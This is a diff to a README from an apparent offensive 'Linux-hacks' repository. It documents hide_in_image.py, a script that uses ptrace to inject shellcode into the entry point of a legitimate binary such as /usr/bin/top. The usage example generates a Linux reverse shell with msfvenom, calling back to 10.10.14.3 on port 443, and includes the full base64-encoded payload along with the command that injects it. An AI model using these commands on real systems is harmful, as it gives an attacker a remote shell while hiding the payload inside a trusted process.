tav-r/Linux-hacks/README.md

 ```

 ### [hide_in_image.py](hide_in_image.py)
-This script forks and lets the child call `ptrace` to let the parent process trace itself.
+This script forks and lets the child call `ptrace` to let the parent process trace it.
 After the child loaded a given binary using `execv`, the parent replaces the code at the entry point with the given shellcode and detaches.
 This is essentially an alternative way to run shellcode.
 ```bash
 msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.3 LPORT=443 | base64 | tr -d '\n'  # ailYmWoCX2oBXg8FSJdIuQIAAbt/AAABUUiJ5moQWmoqWA8FagNeSP/OaiFYDwV19mo7WJlIuy9iaW4vc2gAU0iJ51JXSInmDwU=
 python3 hide_in_image.py /usr/bin/top ailYmWoCX2oBXg8FSJdIuQIAAbt/AAABUUiJ5moQWmoqWA8FagNeSP/OaiFYDwV19mo7WJlIuy9iaW4vc2gAU0iJ51JXSInmDwU=